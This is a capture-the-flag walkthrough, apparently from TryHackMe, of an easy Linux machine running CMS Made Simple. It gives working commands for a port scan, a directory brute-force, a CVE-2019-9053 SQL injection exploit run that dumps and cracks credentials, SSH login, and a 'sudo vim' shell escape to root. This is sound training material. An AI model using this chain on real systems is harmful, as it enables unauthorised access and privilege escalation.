Platform: TryHackMe
OS: Linux
Difficulty: Easy
Tags: web sqli cms hydra sudo vim linux
Date: 2026-05
Linux machine running CMS Made Simple, vulnerable to SQL injection (CVE-2019-9053). Dumped credentials via SQLi, cracked the hash, SSH'd in as mitch, and escalated to root via sudo vim — a one-liner GTFOBins escape.
nmap -sV -sC -p- --min-rate 5000 <TARGET_IP>PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
2222/tcp open ssh OpenSSH 7.2p2
SSH is running on port 2222 — not the default. Important to note for later.
ftp <TARGET_IP>
# Anonymous login
lsNothing useful in the FTP share.
Landing page is a default Apache page. Ran Gobuster:
gobuster dir -u http://<TARGET_IP> \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt/simple (Status: 301)
/simple runs CMS Made Simple 2.2.8.
Checked the version against searchsploit:
searchsploit cms made simple 2.2.8CMS Made Simple < 2.2.10 - SQL Injection (CVE-2019-9053)
Used the exploit script from ExploitDB:
python3 46635.py -u http://<TARGET_IP>/simple --crack -w /usr/share/wordlists/rockyou.txt[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
ssh mitch@<TARGET_IP> -p 2222
cat user.txtChecked for other users:
ls /home
# mitch sunbathsunbath has a home directory — something to note, though not needed for root.
sudo -lUser mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
GTFOBins escape for vim:
sudo vim -c ':!/bin/sh'# whoami
root
cat /root/root.txt- SSH doesn't always run on port 22 — always scan all ports (
-p-) - Check CMS version numbers — known CVEs are very common on CTF machines
- The SQLi exploit dumps credentials and cracks them automatically with a wordlist
sudo vimis one of the most common GTFOBins escalations — memorise it- After getting a shell, always check
/homefor other users